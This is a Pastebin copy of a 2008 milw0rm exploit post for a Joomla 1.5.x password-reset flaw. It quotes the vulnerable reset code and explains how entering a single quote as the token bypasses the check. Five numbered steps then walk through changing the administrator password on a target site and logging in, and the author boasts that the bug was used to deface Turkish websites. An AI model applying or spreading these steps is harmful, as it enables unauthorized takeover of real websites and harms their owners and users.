Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #####################################################################################
- #### Joomla 1.5.x Remote Admin Password Change ####
- #####################################################################################
- # #
- # Author: d3m0n (d3m0n@o2.pl) #
- # Greets: GregStar, gorion, d3d!k #
- # #
- # Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff #
- # #
- #####################################################################################
- File : /components/com_user/controller.php
- #####################################################################################
- Line : 379-399
- function confirmreset()
- {
- // Check for request forgeries
- JRequest::checkToken() or die( 'Invalid Token' );
- // Get the input
- $token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1}
- // Get the model
- $model = &$this->getModel('Reset');
- // Verify the token
- if ($model->confirmReset($token) === false) < --- {2}
- {
- $message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
- $this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
- return false;
- }
- $this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
- }
- #####################################################################################
- File : /components/com_user/models/reset.php
- Line: 111-130
- function confirmReset($token)
- {
- global $mainframe;
- $db = &JFactory::getDBO();
- $db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3}
- // Verify the token
- if (!($id = $db->loadResult()))
- {
- $this->setError(JText::_('INVALID_TOKEN'));
- return false;
- }
- // Push the token and user id into the session
- $mainframe->setUserState($this->_namespace.'token', $token);
- $mainframe->setUserState($this->_namespace.'id', $id);
- return true;
- }
- #####################################################################################
- {1} - Replace ' with empty char
- {3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "
- Example :
- 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm
- 2. Write into field "token" char ' and Click OK.
- 3. Write new password for admin
- 4. Go to url : target.com/administrator/
- 5. Login admin with new password
- # milw0rm.com [2008-08-12]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement